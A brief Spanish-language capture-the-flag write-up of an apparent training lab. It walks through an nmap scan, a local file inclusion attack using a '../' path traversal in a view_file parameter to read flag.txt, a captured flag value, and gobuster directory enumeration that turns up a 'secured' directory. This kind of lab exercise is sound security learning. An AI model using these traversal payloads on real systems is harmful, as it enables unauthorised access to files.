Empezamos con un escaneo para ver que puertos hay abiertos:
nmap -sSV target.ine.local
Vemos que podemos ver 4 archivos en la web, la ruta es: http://192.196.107.3/view_file?file=file1.txt
La pista dice que esta en la raíz a si que probamos manualmente un Local File Inclusion :
http://192.196.107.3/view_file?file=../../../../../../flag.txt

Flag 1: FLAG1_7163ec3e80644de4bbf0f4106042afb3
La segunda pista habla sobre enumerar directorios, a si que usaremos gobuster
gobuster dir -u <http://target.ine.local> -w /usr/share/wordlists/dirb/common.txt

Vemos un directorio interesante llamado secured a si que vamos al navegador a ver que hay ahi.